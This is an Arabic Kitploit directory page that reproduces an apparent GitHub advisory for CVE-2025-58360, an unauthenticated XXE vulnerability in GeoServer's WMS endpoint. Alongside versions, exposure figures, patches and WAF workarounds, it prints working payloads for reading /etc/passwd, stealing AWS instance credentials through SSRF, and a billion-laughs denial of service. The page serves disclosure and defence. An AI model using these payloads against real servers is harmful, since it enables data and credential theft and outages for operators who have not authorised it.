Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
Blackash-CVE-2025-58360 — CVE-2025-58360 | Kitploit
أدوات/GitHubGitHub/carlzhang123/blackash-cve-2025-58360
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبجمع المعلوماتأمن الويباختبار الاختراق
GitHubcarlzhang123/blackash-cve-2025-58360

Blackash-CVE-2025-58360

CVE-2025-58360

عرض المستودع
منذ 8 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

🔓 🛰️ 'CVE-2025-58360' نقطة نهاية WMS في GeoServer عرضة لهجوم XXE 🌟

GeoServer

🏷️ المعلومات الأساسية

  • CVE ID: CVE-2025-58360
  • تاريخ النشر: 📅 25 نوفمبر 2025
  • آخر تعديل: 📅 25 نوفمبر 2025 (لا يزال حديثًا حتى 26 نوفمبر)
  • نوع الثغرة: كيان خارجي XML (XXE) – CWE-611
  • البرنامج المتأثر: GeoServer (خادم جغرافي مكاني مفتوح المصدر مكتوب بلغة Java)
  • الخطورة: 🔥 عالية – درجة CVSS v3.1 الأساسية 7.5
    • المتجه: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:L
  • الاستغلال الفعلي: 🟡 لم يُلاحَظ بعد (26 نوفمبر 2025) – لكن تنتشر أدوات إثبات المفهوم (PoCs) علنًا
  • مصادقة مطلوبة: ❌ لا – بدون مصادقة تمامًا
  • تفاعل المستخدم مطلوب: ❌ لا

🎨 ما الذي يجعل هذه الثغرة مميزة (وخطيرة)؟

هذه XXE كلاسيكية لكنها مدمرة في نقطة نهاية GetMap الخاصة بخدمة خرائط الويب (WMS).
يمكن للمهاجمين:

  • 📂 قراءة أي ملف يمكن لعملية GeoServer الوصول إليه (/etc/passwd, geoserver.xml, مفاتيح خاصة، إلخ)
  • 🌐 تنفيذ تزوير الطلبات من الخادم (SSRF) لمسح الشبكات الداخلية أو استهداف نقاط نهاية البيانات الوصفية (مثل AWS/GCP)
  • 💣 إحداث حرمان من الخدمة (DoS) عبر هجمات توسيع الكيانات ("بليون ضحكة")
  • 🔗 احتمال الربط مع ثغرات أخرى لتحقيق تنفيذ كامل للتعليمات البرمجية عن بُعد (RCE) (ليس بشكل مباشر، لكنه ممكن في بيئات مهيأة بشكل خاطئ)

🛡️ الإصدارات المتأثرة (جدول تفصيلي)

🌍 التعرض العالمي (في الوقت الفعلي حتى 26 نوفمبر 2025)

→ هذا يعني عشرات الآلاف من الخوادم المعرضة للخطر الموجودة حاليًا على الإنترنت المفتوح! 🌐

🧨 دليل تقني كامل لاستغلال الثغرة

نقطة النهاية: POST /geoserver/wms
المعامل الرئيسي: SLD_BODY (يسمح بتركيبات XML خام)
مسار الكود المعرض للثغرة: محلل XML لا يعطل تحليل الكيانات الخارجية → XXE كلاسيكية.

f77f64d7c92fd31b29d537f5205da524

مثال 1 – كشف الملفات (/etc/passwd)

root@kitploit:~
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<sld:StyledLayerDescriptor xmlns:sld="http://www.opengis.net/sld" version="1.0.0">
  <sld:UserLayer>
    <sld:LayerFeatureConstraints>
      <sld:FeatureTypeConstraint>&xxe;</sld:FeatureTypeConstraint>
    </sld:LayerFeatureConstraints>
  </sld:UserLayer>
</sld:StyledLayerDescriptor>

→ تحتوي الاستجابة على محتويات /etc/passwd 🎉

مثال 2 – SSRF إلى البيانات الوصفية الداخلية (مثال AWS)

root@kitploit:~
<!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/">

→ يسرب بيانات اعتماد AWS المؤقتة إذا كان الخادم يعمل على EC2.

مثال 3 – هجوم "بليون ضحكة" لحرمان الخدمة

root@kitploit:~
<!DOCTYPE lolz [
  <!ENTITY lol "lol">
  <!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
  <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
  <!-- repeat up to lol9 -->
]>
<lol>&lol9;</lol>

→ يستهلك غيغابايتات من الذاكرة العشوائية (RAM) في ثوانٍ 💥

🛠️ التصحيحات الرسمية والتنزيلات

الإصدارتاريخ الإصداررابط التنزيل
2.27.025 نوفمبر 2025https://geoserver.org/release/stable/

مستخدمو Docker:

root@kitploit:~
docker pull osgeo/geoserver:2.27.0

🔧 حلول بديلة (إذا لم تتمكن من تطبيق التصحيح فورًا)

  1. احظر XML الخطرة عبر قاعدة WAF/mod_security:
    ارفض الطلبات التي تحتوي على <!ENTITY أو SYSTEM "file://
  2. عطّل معامل SLD_BODY عالميًا (إذا لم يكن ضروريًا)
  3. شغّل GeoServer بنظام ملفات للقراءة فقط + أسقط الصلاحيات (capabilities)
  4. ضعه خلف وكيل عكسي (reverse proxy) يزيل أجسام XML للمستخدمين غير الموثقين

📢 المراجع الرسمية وأدوات إثبات المفهوم (PoCs)

  • إدخال NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-58360
  • نشرة GeoServer الأمنية: https://github.com/geoserver/geoserver/security/advisories/GHSA-fjf5-xgmq-5525
  • تذكرة JIRA: https://osgeo-org.atlassian.net/browse/GEOS-11682
  • PoC آمن وعلني (Python): https://gist.github.com/bolhasec/32fa035354d7cc9417aa297e2fe22b30
  • قالب Nuclei (كشف تلقائي): تم دمجه بالفعل في الفرع الرئيسي

⏰ الخط الزمني

التاريخالحدث
قبل نوفمبر 2025اكتُشفت تلقائيًا بواسطة ماسح XBOW الذكي
25 نوفمبر 2025كشف منسق → تم إصدار التصحيحات
25 نوفمبر 2025تم تعيين CVE ونشره
26 نوفمبر 2025تنتشر الـ PoCs بشكل واسع، وتقفز عمليات فحص التعرض

✨ كلمات ختامية

هذه XXE نموذجية تصيب منصة جغرافية مكانية منتشرة على نطاق واسع مع عشرات الآلاف من الحالات الموجهة للإنترنت.
صدرت التصحيحات في نفس يوم الكشف — تحية كبيرة لفريق GeoServer على السرعة! 🏆
لكن الفترة الزمنية بين توفر التصحيح والاستغلال الجماعي تتقلص بسرعة.

إذا كنت تشغّل GeoServer → قم بالترقية اليوم.
لا تكن عنوان الخبر التالي.

ابقَ آمنًا، ابقَ لامعًا! 🛡️✨

تنزيل الأداة
المكوّنالإصدارات المتأثرةتم الإصلاح فيالحالة
GeoServer المستقل2.26.0 – 2.26.1
≤ 2.25.5
2.26.3, 2.25.6, 2.27.0🔴 متأثر
Docker (osgeo/geoserver)2.26.0 – 2.26.1
≤ 2.25.5
2.26.2+, 2.27.0🔴 متأثر
Maven org.geoserver:gs-wms2.26.0 – 2.26.1
≤ 2.25.5
2.26.2+, 2.25.6🔴 متأثر
Maven org.geoserver.web:gs-web-app2.26.0 – 2.26.1
≤ 2.25.5
2.26.2+, 2.25.6🔴 متأثر
GeoServer 2.27.x والإصدارات الأحدث–تم إصلاحه بالفعل✅ آمن
المصدرالحالات المكشوفةملاحظات
ZoomEye~49,400البحث بـ app:"GeoServer"
FOFA~24,000نتائج العام الماضي
Shodan~31,000المنفذ 8080 + تطابق العنوان
GobySec~20,000فحص الشبكات العامة
2.26.3
25 نوفمبر 2025
تصحيح فرع الصيانة
2.25.625 نوفمبر 2025فرع مدعوم أقدم